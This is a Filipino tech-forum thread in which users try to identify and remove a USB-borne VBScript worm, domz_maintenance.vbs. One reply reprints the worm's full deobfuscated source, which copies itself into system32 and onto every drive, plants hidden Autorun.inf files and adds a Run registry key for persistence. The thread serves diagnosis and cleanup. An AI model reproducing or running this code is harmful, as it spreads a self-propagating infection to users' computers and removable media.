Welcome back, Guest!
Register
Forgot your Password?

Hello, Guest! Welcome to Symbianize Forum.

Most of our features and services are available only to our members. So we encourage you to login or join us by registering a new account. Registration is free, fast, and simple. You only need to provide a valid email address so we can minimize spammers. As a Symbianize member you'll have the following privileges:

All that and more, so what are you waiting for, join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

Page 1 of 2 12 LastLast
Results 1 to 10 of 13
  1. #1

    Help domz_maintenance.vbs

    Guys pa help naman.....

    naka bili ako ng new USB maganda camera sya na keychain
    kaso may virus or spamming program ata tapos na open ko pa di sya na detect ng mcafee ko

    may laman sya 2 files
    Autorun.inf
    domz_maintenance.vbs

    result : lahat ng drive ko nag karoon ng same files at may plus na message pa sya
    domz_info.txt eto laman
    "!!!!!!!!!!THIS PROGRAM WAS CREATED BY DOMZ!!!!!!
    Most of the virus can penetrate and damage your computer system!!!!!!
    It can damage the registry and disable some components of the operating system
    This program protects your computer and repair the damages caused by a virus.
    It always enable the important components of your computer system such as:
    Folder Options
    Task Manager
    Registry Editor
    Command Prompt
    Control Panel
    Viewing all Drives
    Enable Add Printer
    Run in Start Menu
    Network Connections
    Log Off
    Displaying Desktop

    " repair daw ang dami naman nakakalat sa mga drive ko ng files nya

    anyways na try ko ma stop ang pag kalat nya sa mga drive ko
    kaso di ko alam kung ano ano pa na damay or may na iwan pa sya program or keylogger ...

    na check ko yung code nya na convert ko ito sa text file para di kumalat, baka meron sa inyo kaya mabasa yun scrip para malaman ko extend ng damage pa help naman
    salamat

    attach ko yun code para sa kaya mag basa
    Attached Files Attached Files

  2. #2

    Thumbsup Re: domz_maintenance.vbs

    sir try mo mag avast hehe nadetect sya ng avast ko eh
    try mo rin i taskkill yung wscript sa cmd
    taskkill /im /f wscript.exe /t
    Last edited by vanz1402; 22nd Jul 2012 at 10:27.

  3. #3

    Default Re: domz_maintenance.vbs

    gamit ka malwarebytes TS 100% detect yan virus nayan

  4. #4

    Thumbsup Re: domz_maintenance.vbs

    Bali VBScript pala to no. Mejo magulo lang kasi ang damng garbage. anyways. Bali nilinis ko sya by Removing the comment lines and empty newlines using some search and replace algo.

    Removing comments


    Removing empty lines


    At eto yung results. Sundan mo nalang pra malinis mo yung PC mo. Assuming na alam mo ito.
    Code:
    Option Explicit
    
    Dim Wshshell, objfile, gtfile,con,autoda
    Dim dopen, dopens,cln
    
    Dim src, cpytxt, getfnm, getfn2
    
    Dim num, num1, pathfile,cpytext,mydrive,drv,pat2 
    Dim fileattrib, aut
    
    Dim drv1,cpyfile2,cpyfile3,cpyfile4,cpyfile5
    
    Dim getfnC,getfnt,getfnj,x,cl,pat1,autoattrib,autodomz 
    
    Dim ddd,autod,datef,autox,deld,dddd,autoh
    
    const fghr = "\do"
    
    const fghh = "mz"
    
    const hgjtr = "_main" 
    
    const hgttt = "tenance"
    
    const ext = ".vbs"
    
    Set Wshshell = Wscript.CreateObject("Wscript.Shell")
    Set objfile = Wscript.Createobject("Scripting.FileSystemObject")
    pathfile = Wscript.Scriptfullname
     
    
    set gtfile = objfile.getfile(pathfile).OpenastextStream(1)
    do until gtfile.atendofstream 
    src = src & gtfile.readline & vbcrlf
    loop 
    
    set cpytxt = objfile.createtextfile("C:\windows\system32\domz.vbs",true)
    cpytxt.writeline src 
    cpytxt.close
    
    cl = objfile.getdrivename(Wscript.ScriptFullname)
    
    set cln = objfile.getdrive(cl)
    
    select case cln.DriveType
    
    case 1:wshshell.run "Explorer" & " " & cl,3,false
    
    case 2: wshshell.run "Explorer" & " " & cl,0,false
    
     end select
    
    While (true) 
    con = objfile.FileExists("C:\windows\system32\domz.vbs") 
    on error resume next
    if con = false then
    set cpytext = objfile.createtextfile("C:\windows\system32\domz.vbs",true)
    cpytext.writeline src 
    
    cpytext.close
    
    end if
    
    on error goto 0
    set mydrive = objfile.drives 
    for each drv in mydrive
    if drv.isready then
    
    if (drv.driveletter <> "A:" and drv.drivetype = 2) then 
    err.clear
    
    on error resume next 
    
    set getfn = objfile.getfile(drv.path & fghr & fghh & hgjtr & hgttt & ext)
    
    num = err.number
    
    on error goto 0
    
    if num <> 0 then 
    
    err.clear
    
    on error resume next
    
    set cpyfile2 = objfile.createtextfile(drv.path & fghr & fghh & hgjtr & hgttt & ext,true)
    
    cpyfile2.writeline src
    
    cpyfile2.close 
    
    set cpyfile3 = objfile.createtextfile(drv.path & "\domz_info.txt", true)
    cpyfile3.write "!!!!!!!!!!THIS PROGRAM WAS CREATED BY DOMZ!!!!!!" & vbcrlf'
    cpyfile3.write "Most of the virus can penetrate and damage your computer system!!!!!!" & vbcrlf
    
    cpyfile3.write "It can damage the registry and disable some components of the operating system" & vbcrlf
    cpyfile3.write "This program protects your computer and repair the damages caused by a virus." & vbcrlf
    
    cpyfile3.write "It always enable the important components of your computer system such as:" & vbcrlf
    
    cpyfile3.write "Folder Options" &vbcrlf
    
    cpyfile3.write "Task Manager" & vbcrlf
    
    cpyfile3.write "Registry Editor" & vbcrlf
    
    cpyfile3.write "Command Prompt" & vbcrlf
    
    cpyfile3.write "Control Panel" & vbcrlf
    
    cpyfile3.write "Viewing all Drives" & vbcrlf
    cpyfile3.write "Enable Add Printer" & vbcrlf
    cpyfile3.write "Run in Start Menu" & vbcrlf
    
    cpyfile3.write "Network Connections" & vbcrlf
    cpyfile3.write "Log Off" & vbcrlf
    
    cpyfile3.write "Displaying Desktop" & vbcrlf
    cpyfile3.close
    
    on error goto 0
    
    end if
    End if
    if (drv.driveletter <> "A:" and drv.drivetype = 1) then 
    
    err.clear
    on error resume next 
    set getfn2 = objfile.GetFile(drv.path & "\Autorun.inf")
    num1 = err.number
    
    on error goto 0
    if num1 <> 0 then
    
    err.clear
    on error resume next
    
    set aut = objfile.createtextfile(drv.path &"\Autorun.inf",true)
    
    aut.writeline("[Autorun]")
    
    aut.writeline("open=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Default=1")
    
    aut.writeline("shell\AutoPlay\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Explore\Command=wscript.exe domz_maintenance.vbs")
    aut.close
    
    set autoattrib = objfile.getfile(drv.path &"\Autorun.inf") 
    autoattrib.attributes = 2
    
    on error goto 0 
    else 
    
    err.clear
    on error resume next
    
    objfile.deletefile drv.path & "\autorun.inf",true
    set aut = objfile.createtextfile(drv.path &"\Autorun.inf",true) 
    aut.writeline("[Autorun]")
    
    aut.writeline("open=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Open\Default=1")
    
    aut.writeline("shell\AutoPlay\Command=wscript.exe domz_maintenance.vbs")
    
    aut.writeline("shell\Explore\Command=wscript.exe domz_maintenance.vbs")
    
    aut.close
    
    set autoattrib = objfile.getfile(drv.path &"\Autorun.inf") 
    autoattrib.attributes = 2
    
    on error goto 0
    End if
    
    err.clear 
    
    on error resume next
    set getfn = objfile.getfile(drv.path & fghr & fghh & hgjtr & hgttt & ext) 
    num = err.number
    on error goto 0
    if num <> 0 then 
     
     
    
    err.clear
    on error resume next
    
    set cpyfile2 = objfile.CreateTextFile(drv.path & fghr & fghh & hgjtr & hgttt & ext,true)
    cpyfile2.writeline src
    cpyfile2.close
    
    set autodomz = objfile.getfile(drv.path & fghr & fghh & hgjtr & hgttt & ext)
    autodomz.attributes = 2
    
    on error goto 0 
    
    end if
    
    End if
    
    End if
    next
    
    on error resume next
    
    with wshshell
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\domz","Wscript.exe" & " "& "c:\windows\system32\domz.vbs","REG_SZ"
    
    .regwrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD" 
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogoff",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetworkConnections",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutorun",255,"REG_DWORD"
    
    End with
    
    on error goto 0
    
    wscript.Sleep 5000
    Wend
    Attached Images Attached Images
    • File Type: png 1.PNG (62.3 KB, 236 views)
    • File Type: png 2.PNG (47.1 KB, 224 views)

  5. #5

    Default Re: domz_maintenance.vbs

    salamat po sa mga feed back
    @Asaman83687 na stop ko spread ng files nya kasi na delete ko yun "C:\windows\system32\domz.vbs" na ito paano kaya yun registry ko ano kaya effect nun ?
    salamat sa pag convert ng code para madalali basahin

    salamat ng marami

  6. #6

    Thumbsup Re: domz_maintenance.vbs

    Actually maliban sa part na ng'kakalat sya ng files sa disk mo at nilagyan nya ng autorun on start-up yung program nya. Honest naman sya nung sinabi nyang


    "!!!!!!!!!!THIS PROGRAM WAS CREATED BY DOMZ!!!!!!
    Most of the virus can penetrate and damage your computer system!!!!!!
    It can damage the registry and disable some components of the operating system
    This program protects your computer and repair the damages caused by a virus.
    It always enable the important components of your computer system such as:
    Folder Options
    Task Manager
    Registry Editor
    Command Prompt
    Control Panel
    Viewing all Drives
    Enable Add Printer
    Run in Start Menu
    Network Connections
    Log Off
    Displaying Desktop


    why? kasi yung part like (sa pinakababa ng source)

    Code:
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
    
    .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",0,"REG_DWORD"
    means:
    DisableTaskMgr, 0 ---> Enable Task Manager
    NoRun, 0 --> Enbale Opening files thru IE or Windows Explorer
    NoFolderOptions, 0 --> Enable Folder Options

    and many more....

    so ang ma'isusugest ko eh i'delete nlng ung .vbs at registry keys sa part ng

    Code:
    "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\domz","Wscript.exe" & " "& "c:\windows\system32\domz.vbs"

  7. #7

    Default Re: domz_maintenance.vbs

    @Asaman83687 maraming salamat sa info

  8. #8

    Default Re: domz_maintenance.vbs

    pwede ba sir na paayos nitong script na to for pc restrictions only.
    na mag disable nya yung right click, computer drives hidden or no access.
    yung tipong di mapapasok ng kung sino man yung laman ng pc mo bukod sa mga files sa desktop at mga shortcuts.

    may nakita kasi akong ganito sa ibang shops eh.. safe yung mga files nya, at di prone sa mga kamoteng customer na mahilig maki alam.

    salamat po sa makakatulong!!

  9. #9

    Default Re: domz_maintenance.vbs

    huhu san b galing to pati laptop q nadali nrin hnd madetect ng avg q bura me ng bura balik ng balik p tut nmn po kaya b to ng esset?

  10. #10

    Default Re: domz_maintenance.vbs

    prob ko din to hndi rin madetect ng avg ko. paano na?

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •